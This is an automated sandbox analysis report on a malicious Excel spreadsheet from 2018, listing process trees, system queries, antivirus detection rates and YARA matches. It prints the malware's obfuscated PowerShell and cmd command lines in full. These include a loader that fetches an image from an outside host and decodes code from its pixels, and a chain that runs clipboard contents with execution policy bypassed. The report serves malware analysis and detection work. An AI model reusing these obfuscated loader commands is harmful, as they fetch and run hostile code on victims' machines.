Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -ba
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EchO ^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte & (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /V:ON/C'set d0=rMc5( ''Fj$hEJOYU2uwf=ip7CGdI-klmngTR,H34/^|B]Lbs'o%AXvy1[V_0{D;+:}*^&x\aPSW6^^9`etK).N&&for %x in (12,2,11,14,5,5,5,75,75,75,67,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,12,1,48,37,48,28,35,48,37,48,72,12,35,29,48,81,5,5,4,7,60,55,65,60,17,65,60,59,65,7,5,29,20,48,17,27,26,48,37,48,53,51,48,37,48,0,22,70,46,31,78,64,48,81,5,5,4,5,5,56,35,54,71,12,44,4,7,60,59,65,60,55,65,7,29,8,5,48,1,51,35,48,37,48,38,48,81,5,5,81,62,5,5,82,4,7,60,59,65,60,55,65,60,17,65,7,5,29,20,5,48,47,12,48,37,48,79,29,48,37,48,22,79,12,1,48,81,5,5,4,7,60,55,65,60,59,65,60,17,65,60,40,65,60,39,65,7,29,20,5,48,70,48,37,48,53,70,0,22,48,37,48,43,48,37,48,27,26,83,57,48,37,48,31,12,64,48,81,5,4,5,56,35,54,71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -ba
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EchO ^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte & (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )

Language, Device and Operating System Detection:

Queries the installation date of Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Queries the cryptographic machine GUID
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Behavior Graph ID: 87288
Sample: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls
Startdate: 31/10/2018
Architecture: WINDOWS
Score: 64

Process tree (signatures per node):

Sample
  Signatures: Multi AV Scanner detection for submitted file; Obfuscated command line found; Very long command line found; PowerShell case anomaly found
  started: EXCEL.EXE
    Signatures: Obfuscated command line found; Very long command line found; Document exploit detected (process start blacklist hit)
    started: cmd.exe
      Signatures: Obfuscated command line found; PowerShell case anomaly found
      started: cmd.exe
        Signatures: Obfuscated command line found; PowerShell case anomaly found
        started: cmd.exe
          Signatures: PowerShell case anomaly found
          started: powershell.exe
        started: cmd.exe
        started: clip.exe

Simulations

Behavior and APIs

Time | Type | Description
08:09:42 | API Interceptor | 3x Sleep call for process: EXCEL.EXE modified
08:09:53 | API Interceptor | 1x Sleep call for process: clip.exe modified
08:09:55 | API Interceptor | 1x Sleep call for process: powershell.exe modified

Antivirus Detection

Initial Sample

Source | Detection | Scanner | Label
634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls | 34% | virustotal |
634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls | 9% | metadefender |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author
00000008.00000002.1587961229.018E0000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000006.00000002.1575622489.003C0000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000006.00000000.1573363401.00010000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000006.00000000.1575210257.00010000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000006.00000000.1574110051.00010000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000008.00000002.1586592723.01250000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000006.00000003.1575306060.00010000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000006.00000000.1574574233.00010000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000006.00000002.1575587396.00150000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context
